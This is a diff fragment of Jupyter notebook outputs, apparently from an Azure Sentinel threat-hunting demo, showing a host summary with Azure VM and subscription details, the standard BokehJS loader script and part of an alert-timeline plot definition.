+       "This shows a summary data for a host. It shows host properties obtained from OMS Heartbeat and Azure API.<br>It also lists Azure Sentinel alerts and bookmakrs related to to the host.<br>Data and plots are stored in the result class returned by this function."
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<h2>Host Entity details</h2>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "These are the host entity details gathered from Heartbeat and, if applicable, AzureNetworkAnalytics and Azure management API.<br>The data shows OS information, IP Addresses assigned the host and any Azure VM information available."
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "{ 'AdditionalData': {},\n",
+      "  'AzureDetails': { 'ResourceDetails': { 'Admin User': 'mstic_admin',\n",
+      "                                         'Azure Location': 'eastus',\n",
+      "                                         'Disks': [],\n",
+      "                                         'Image': 'Windows-10 rs5-pro',\n",
+      "                                         'Network Interfaces': [ '/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/BlackHatDemo/providers/Microsoft.Network/networkInterfaces/blackhatdemohost86'],\n",
+      "                                         'Tags': \"{'Role': 'Demo'}\",\n",
+      "                                         'VM Size': 'Standard_B2s'},\n",
+      "                    'ResourceGroup': 'BlackHatDemo',\n",
+      "                    'ResourceId': '/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/BlackHatDemo/providers/Microsoft.Compute/virtualMachines/BlackHatDemoHost',\n",
+      "                    'ResourceProvider': 'Microsoft.Compute',\n",
+      "                    'ResourceType': 'virtualMachines',\n",
+      "                    'Solutions': '\"security\", \"changeTracking\", \"networkMonitoring\", \"serviceMap\", '\n",
+      "                                 '\"securityCenterFree\", \"securityInsights\", \"windowsFirewall\", '\n",
+      "                                 '\"windowsEventForwarding\"',\n",
+      "                    'SubscriptionDetails': { 'Display Name': 'ASI Hunting Demo Environment',\n",
+      "                                             'Spending Limit': <SpendingLimit.off: 'Off'>,\n",
+      "                                             'State': 'SubscriptionState.enabled',\n",
+      "                                             'Subscription ID': '40dcc8bf-0478-4f3b-b275-ed0a94f2c013',\n",
+      "                                             'Subscription Location': 'Internal_2014-09-01',\n",
+      "                                             'Subscription Quota': 'Internal_2014-09-01'},\n",
+      "                    'SubscriptionId': '40dcc8bf-0478-4f3b-b275-ed0a94f2c013'},\n",
+      "  'Environment': 'Azure',\n",
+      "  'HostName': 'BlackHatDemoHos',\n",
+      "  'IPAddress': { 'AdditionalData': {},\n",
+      "                 'Address': '20.185.182.48',\n",
+      "                 'Location': { 'AdditionalData': {},\n",
+      "                               'CountryName': 'United States',\n",
+      "                               'Latitude': 38.71,\n",
+      "                               'Longitude': -78.16,\n",
+      "                               'Type': 'geolocation'},\n",
+      "                 'Type': 'ipaddress'},\n",
+      "  'OSName': '',\n",
+      "  'OSType': 'Windows',\n",
+      "  'OSVMajorVersion': '10',\n",
+      "  'OSVMinorVersion': '0',\n",
+      "  'OmsSolutions': [ '\"security\"',\n",
+      "                    '\"changeTracking\"',\n",
+      "                    '\"networkMonitoring\"',\n",
+      "                    '\"serviceMap\"',\n",
+      "                    '\"securityCenterFree\"',\n",
+      "                    '\"securityInsights\"',\n",
+      "                    '\"windowsFirewall\"',\n",
+      "                    '\"windowsEventForwarding\"'],\n",
+      "  'SourceComputerId': '73a015ec-e2b6-4bf7-b353-ebeafb54254e',\n",
+      "  'Type': 'host',\n",
+      "  'VMUUID': '3f2b6a14-4c02-41aa-a2e8-6859ee4c7847',\n",
+      "  'private_ips': [],\n",
+      "  'public_ips': []}\n"
+     ]
+    },
+    {
+     "data": {
+      "text/html": [
+       "<h2>Timeline of related alerts</h2>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "Each marker on the timeline indicates one or more alerts related to the host."
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"1721\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "\n",
+       "(function(root) {\n",
+       "  function now() {\n",
+       "    return new Date();\n",
+       "  }\n",
+       "\n",
+       "  var force = true;\n",
+       "\n",
+       "  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n",
+       "    root._bokeh_onload_callbacks = [];\n",
+       "    root._bokeh_is_loading = undefined;\n",
+       "  }\n",
+       "\n",
+       "  var JS_MIME_TYPE = 'application/javascript';\n",
+       "  var HTML_MIME_TYPE = 'text/html';\n",
+       "  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n",
+       "  var CLASS_NAME = 'output_bokeh rendered_html';\n",
+       "\n",
+       "  /**\n",
+       "   * Render data to the DOM node\n",
+       "   */\n",
+       "  function render(props, node) {\n",
+       "    var script = document.createElement(\"script\");\n",
+       "    node.appendChild(script);\n",
+       "  }\n",
+       "\n",
+       "  /**\n",
+       "   * Handle when an output is cleared or removed\n",
+       "   */\n",
+       "  function handleClearOutput(event, handle) {\n",
+       "    var cell = handle.cell;\n",
+       "\n",
+       "    var id = cell.output_area._bokeh_element_id;\n",
+       "    var server_id = cell.output_area._bokeh_server_id;\n",
+       "    // Clean up Bokeh references\n",
+       "    if (id != null && id in Bokeh.index) {\n",
+       "      Bokeh.index[id].model.document.clear();\n",
+       "      delete Bokeh.index[id];\n",
+       "    }\n",
+       "\n",
+       "    if (server_id !== undefined) {\n",
+       "      // Clean up Bokeh references\n",
+       "      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n",
+       "      cell.notebook.kernel.execute(cmd, {\n",
+       "        iopub: {\n",
+       "          output: function(msg) {\n",
+       "            var id = msg.content.text.trim();\n",
+       "            if (id in Bokeh.index) {\n",
+       "              Bokeh.index[id].model.document.clear();\n",
+       "              delete Bokeh.index[id];\n",
+       "            }\n",
+       "          }\n",
+       "        }\n",
+       "      });\n",
+       "      // Destroy server and session\n",
+       "      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n",
+       "      cell.notebook.kernel.execute(cmd);\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  /**\n",
+       "   * Handle when a new output is added\n",
+       "   */\n",
+       "  function handleAddOutput(event, handle) {\n",
+       "    var output_area = handle.output_area;\n",
+       "    var output = handle.output;\n",
+       "\n",
+       "    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n",
+       "    if ((output.output_type != \"display_data\") || (!output.data.hasOwnProperty(EXEC_MIME_TYPE))) {\n",
+       "      return\n",
+       "    }\n",
+       "\n",
+       "    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n",
+       "\n",
+       "    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n",
+       "      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n",
+       "      // store reference to embed id on output_area\n",
+       "      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n",
+       "    }\n",
+       "    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n",
+       "      var bk_div = document.createElement(\"div\");\n",
+       "      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n",
+       "      var script_attrs = bk_div.children[0].attributes;\n",
+       "      for (var i = 0; i < script_attrs.length; i++) {\n",
+       "        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n",
+       "        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n",
+       "      }\n",
+       "      // store reference to server id on output_area\n",
+       "      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  function register_renderer(events, OutputArea) {\n",
+       "\n",
+       "    function append_mime(data, metadata, element) {\n",
+       "      // create a DOM node to render to\n",
+       "      var toinsert = this.create_output_subarea(\n",
+       "        metadata,\n",
+       "        CLASS_NAME,\n",
+       "        EXEC_MIME_TYPE\n",
+       "      );\n",
+       "      this.keyboard_manager.register_events(toinsert);\n",
+       "      // Render to node\n",
+       "      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n",
+       "      render(props, toinsert[toinsert.length - 1]);\n",
+       "      element.append(toinsert);\n",
+       "      return toinsert\n",
+       "    }\n",
+       "\n",
+       "    /* Handle when an output is cleared or removed */\n",
+       "    events.on('clear_output.CodeCell', handleClearOutput);\n",
+       "    events.on('delete.Cell', handleClearOutput);\n",
+       "\n",
+       "    /* Handle when a new output is added */\n",
+       "    events.on('output_added.OutputArea', handleAddOutput);\n",
+       "\n",
+       "    /**\n",
+       "     * Register the mime type and append_mime function with output_area\n",
+       "     */\n",
+       "    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n",
+       "      /* Is output safe? */\n",
+       "      safe: true,\n",
+       "      /* Index of renderer in `output_area.display_order` */\n",
+       "      index: 0\n",
+       "    });\n",
+       "  }\n",
+       "\n",
+       "  // register the mime type if in Jupyter Notebook environment and previously unregistered\n",
+       "  if (root.Jupyter !== undefined) {\n",
+       "    var events = require('base/js/events');\n",
+       "    var OutputArea = require('notebook/js/outputarea').OutputArea;\n",
+       "\n",
+       "    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n",
+       "      register_renderer(events, OutputArea);\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  \n",
+       "  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n",
+       "    root._bokeh_timeout = Date.now() + 5000;\n",
+       "    root._bokeh_failed_load = false;\n",
+       "  }\n",
+       "\n",
+       "  var NB_LOAD_WARNING = {'data': {'text/html':\n",
+       "     \"<div style='background-color: #fdd'>\\n\"+\n",
+       "     \"<p>\\n\"+\n",
+       "     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n",
+       "     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n",
+       "     \"</p>\\n\"+\n",
+       "     \"<ul>\\n\"+\n",
+       "     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n",
+       "     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n",
+       "     \"</ul>\\n\"+\n",
+       "     \"<code>\\n\"+\n",
+       "     \"from bokeh.resources import INLINE\\n\"+\n",
+       "     \"output_notebook(resources=INLINE)\\n\"+\n",
+       "     \"</code>\\n\"+\n",
+       "     \"</div>\"}};\n",
+       "\n",
+       "  function display_loaded() {\n",
+       "    var el = document.getElementById(\"1721\");\n",
+       "    if (el != null) {\n",
+       "      el.textContent = \"BokehJS is loading...\";\n",
+       "    }\n",
+       "    if (root.Bokeh !== undefined) {\n",
+       "      if (el != null) {\n",
+       "        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n",
+       "      }\n",
+       "    } else if (Date.now() < root._bokeh_timeout) {\n",
+       "      setTimeout(display_loaded, 100)\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "\n",
+       "  function run_callbacks() {\n",
+       "    try {\n",
+       "      root._bokeh_onload_callbacks.forEach(function(callback) {\n",
+       "        if (callback != null)\n",
+       "          callback();\n",
+       "      });\n",
+       "    } finally {\n",
+       "      delete root._bokeh_onload_callbacks\n",
+       "    }\n",
+       "    console.debug(\"Bokeh: all callbacks have finished\");\n",
+       "  }\n",
+       "\n",
+       "  function load_libs(css_urls, js_urls, callback) {\n",
+       "    if (css_urls == null) css_urls = [];\n",
+       "    if (js_urls == null) js_urls = [];\n",
+       "\n",
+       "    root._bokeh_onload_callbacks.push(callback);\n",
+       "    if (root._bokeh_is_loading > 0) {\n",
+       "      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n",
+       "      return null;\n",
+       "    }\n",
+       "    if (js_urls == null || js_urls.length === 0) {\n",
+       "      run_callbacks();\n",
+       "      return null;\n",
+       "    }\n",
+       "    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n",
+       "    root._bokeh_is_loading = css_urls.length + js_urls.length;\n",
+       "\n",
+       "    function on_load() {\n",
+       "      root._bokeh_is_loading--;\n",
+       "      if (root._bokeh_is_loading === 0) {\n",
+       "        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n",
+       "        run_callbacks()\n",
+       "      }\n",
+       "    }\n",
+       "\n",
+       "    function on_error() {\n",
+       "      console.error(\"failed to load \" + url);\n",
+       "    }\n",
+       "\n",
+       "    for (var i = 0; i < css_urls.length; i++) {\n",
+       "      var url = css_urls[i];\n",
+       "      const element = document.createElement(\"link\");\n",
+       "      element.onload = on_load;\n",
+       "      element.onerror = on_error;\n",
+       "      element.rel = \"stylesheet\";\n",
+       "      element.type = \"text/css\";\n",
+       "      element.href = url;\n",
+       "      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n",
+       "      document.body.appendChild(element);\n",
+       "    }\n",
+       "\n",
+       "    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.1.1.min.js\": \"kLr4fYcqcSpbuI95brIH3vnnYCquzzSxHPU6XGQCIkQRGJwhg0StNbj1eegrHs12\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.1.1.min.js\": \"xIGPmVtaOm+z0BqfSOMn4lOR6ciex448GIKG4eE61LsAvmGj48XcMQZtKcE/UXZe\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.1.1.min.js\": \"Dc9u1wF/0zApGIWoBbH77iWEHtdmkuYWG839Uzmv8y8yBLXebjO9ZnERsde5Ln/P\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.1.1.min.js\": \"cT9JaBz7GiRXdENrJLZNSC6eMNF3nh3fa5fTF51Svp+ukxPdwcU5kGXGPBgDCa2j\"};\n",
+       "\n",
+       "    for (var i = 0; i < js_urls.length; i++) {\n",
+       "      var url = js_urls[i];\n",
+       "      var element = document.createElement('script');\n",
+       "      element.onload = on_load;\n",
+       "      element.onerror = on_error;\n",
+       "      element.async = false;\n",
+       "      element.src = url;\n",
+       "      if (url in hashes) {\n",
+       "        element.crossOrigin = \"anonymous\";\n",
+       "        element.integrity = \"sha384-\" + hashes[url];\n",
+       "      }\n",
+       "      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n",
+       "      document.head.appendChild(element);\n",
+       "    }\n",
+       "  };\n",
+       "\n",
+       "  function inject_raw_css(css) {\n",
+       "    const element = document.createElement(\"style\");\n",
+       "    element.appendChild(document.createTextNode(css));\n",
+       "    document.body.appendChild(element);\n",
+       "  }\n",
+       "\n",
+       "  \n",
+       "  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.1.1.min.js\"];\n",
+       "  var css_urls = [];\n",
+       "  \n",
+       "\n",
+       "  var inline_js = [\n",
+       "    function(Bokeh) {\n",
+       "      Bokeh.set_log_level(\"info\");\n",
+       "    },\n",
+       "    function(Bokeh) {\n",
+       "    \n",
+       "    \n",
+       "    }\n",
+       "  ];\n",
+       "\n",
+       "  function run_inline_js() {\n",
+       "    \n",
+       "    if (root.Bokeh !== undefined || force === true) {\n",
+       "      \n",
+       "    for (var i = 0; i < inline_js.length; i++) {\n",
+       "      inline_js[i].call(root, root.Bokeh);\n",
+       "    }\n",
+       "    if (force === true) {\n",
+       "        display_loaded();\n",
+       "      }} else if (Date.now() < root._bokeh_timeout) {\n",
+       "      setTimeout(run_inline_js, 100);\n",
+       "    } else if (!root._bokeh_failed_load) {\n",
+       "      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n",
+       "      root._bokeh_failed_load = true;\n",
+       "    } else if (force !== true) {\n",
+       "      var cell = $(document.getElementById(\"1721\")).parents('.cell').data().cell;\n",
+       "      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n",
+       "    }\n",
+       "\n",
+       "  }\n",
+       "\n",
+       "  if (root._bokeh_is_loading === 0) {\n",
+       "    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n",
+       "    run_inline_js();\n",
+       "  } else {\n",
+       "    load_libs(css_urls, js_urls, function() {\n",
+       "      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n",
+       "      run_inline_js();\n",
+       "    });\n",
+       "  }\n",
+       "}(window));"
+      ],
+      "application/vnd.bokehjs_load.v0+json": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  \n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"1721\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error() {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (var i = 0; i < css_urls.length; i++) {\n      var url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error;\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.1.1.min.js\": \"kLr4fYcqcSpbuI95brIH3vnnYCquzzSxHPU6XGQCIkQRGJwhg0StNbj1eegrHs12\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.1.1.min.js\": \"xIGPmVtaOm+z0BqfSOMn4lOR6ciex448GIKG4eE61LsAvmGj48XcMQZtKcE/UXZe\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.1.1.min.js\": \"Dc9u1wF/0zApGIWoBbH77iWEHtdmkuYWG839Uzmv8y8yBLXebjO9ZnERsde5Ln/P\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.1.1.min.js\": \"cT9JaBz7GiRXdENrJLZNSC6eMNF3nh3fa5fTF51Svp+ukxPdwcU5kGXGPBgDCa2j\"};\n\n    for (var i = 0; i < js_urls.length; i++) {\n      var url = js_urls[i];\n      var element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error;\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.1.1.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"1721\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"37bbe05e-f10e-4d65-993b-069a382420a1\" data-root-id=\"1792\"></div>\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "(function(root) {\n",
+       "  function embed_document(root) {\n",
+       "    \n",
+       "  var docs_json = {\"a48f913b-f3db-443c-8fcd-e3ed1ebdc15d\":{\"roots\":{\"references\":[{\"attributes\":{\"children\":[{\"id\":\"1724\"},{\"id\":\"1756\"}]},\"id\":\"1792\",\"type\":\"Column\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"navy\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"navy\"},\"size\":{\"units\":\"screen\",\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1789\",\"type\":\"Diamond\"},{\"attributes\":{\"fill_alpha\":0.2,\"fill_color\":\"navy\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[2,2],\"line_width\":0.5},\"id\":\"1781\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"source\":{\"id\":\"1722\"}},\"id\":\"1791\",\"type\":\"CDSView\"},{\"attributes\":{\"formatter\":{\"id\":\"1796\"},\"ticker\":{\"id\":\"1740\"},\"visible\":false},\"id\":\"1739\",\"type\":\"LinearAxis\"},{\"attributes\":{},\"id\":\"1763\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"1731\",\"type\":\"LinearScale\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"1802\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"end\":1594408331500.0,\"start\":1594406309500.0},\"id\":\"1727\",\"type\":\"Range1d\"},{\"attributes\":{\"data_source\":{\"id\":\"1722\"},\"glyph\":{\"id\":\"1788\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1789\"},\"selection_glyph\":null,\"view\":{\"id\":\"1791\"}},\"id\":\"1790\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"axis\":{\"id\":\"1735\"},\"minor_grid_line_alpha\":0.3,\"minor_grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"1738\",\"type\":\"Grid\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"1803\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"start\":-1.0},\"id\":\"1729\",\"type\":\"Range1d\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"1804\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"1805\",\"type\":\"DaysTicker\"},{\"attributes\":{},\"id\":\"1740\",\"type\":\"BasicTicker\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"1809\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"axis_label\":\"Event Time\",\"formatter\":{\"id\":\"1785\"},\"ticker\":{\"id\":\"1736\"}},\"id\":\"1735\",\"type\":\"DatetimeAxis\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"1810\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"text\":\"Timeline: Related Alerts\"},\"id\":\"1725\",\"type\":\"Title\"},{\"attributes\":{\"callback\":null,\"formatters\":{\"Tooltip\":\"printf\"},\"tooltips\":[[\"AlertName\",\"@AlertName\"],[\"TimeGenerated\",\"@TimeGenerated\"]]},\"id\":\"1723\",\"type\":\"HoverTool\"},{\"attributes\":{\"num_minor_ticks\":10,\"tickers\":[{\"id\":\"1802\"},{\"id\":\"1803\"},{\"id\":\"1804\"},{\"id\":\"1805\"},{\"id\":\"1806\"},{\"id\":\"1807\"},{\"id\":\"1808\"},{\"id\":\"1809\"},{\"id\":\"1810\"},{\"id\":\"1811\"},{\"id\":\"1812\"},{\"id\":\"1813\"}]},\"id\":\"1736\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"1806\",\"type\":\"DaysTicker\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"1808\",\"type\":\"DaysTicker\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"1743\",\"type\":\"WheelZoomTool\"},{\"attributes\":{\"below\":[{\"id\":\"1735\"}],\"center\":[{\"id\":\"1738\"},{\"id\":\"1742\"}],\"left\":[{\"id\":\"1739\"}],\"min_border_left\":50,\"plot_height\":200,\"plot_width\":900,\"renderers\":[{\"id\":\"1790\"}],\"title\":{\"id\":\"1725\"},\"toolbar\":{\"id\":\"1749\"},\"x_range\":{\"id\":\"1727\"},\"x_scale\":{\"id\":\"1731\"},\"y_range\":{\"id\":\"1729\"},\"y_scale\":{\"id\":\"1733\"}},\"id\":\"1724\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"axis\":{\"id\":\"1739\"},\"dimension\":1,\"grid_line_color\":null,\"ticker\":null},\"id\":\"1742\",\"type\":\"Grid\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"1812\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"1807\",\"type\":\"DaysTicker\"},{\"attributes\":{},\"id\":\"1746\",\"type\":\"SaveTool\"},{\"attributes\":{},\"id\":\"1813\",\"type\":\"YearsTicker\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"1818\",\"type\":\"DaysTicker\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"1811\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"overlay\":{\"id\":\"1748\"}},\"id\":\"1744\",\"type\":\"BoxZoomTool\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"1824\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"1821\",\"type\":\"DaysTicker\"},{\"attributes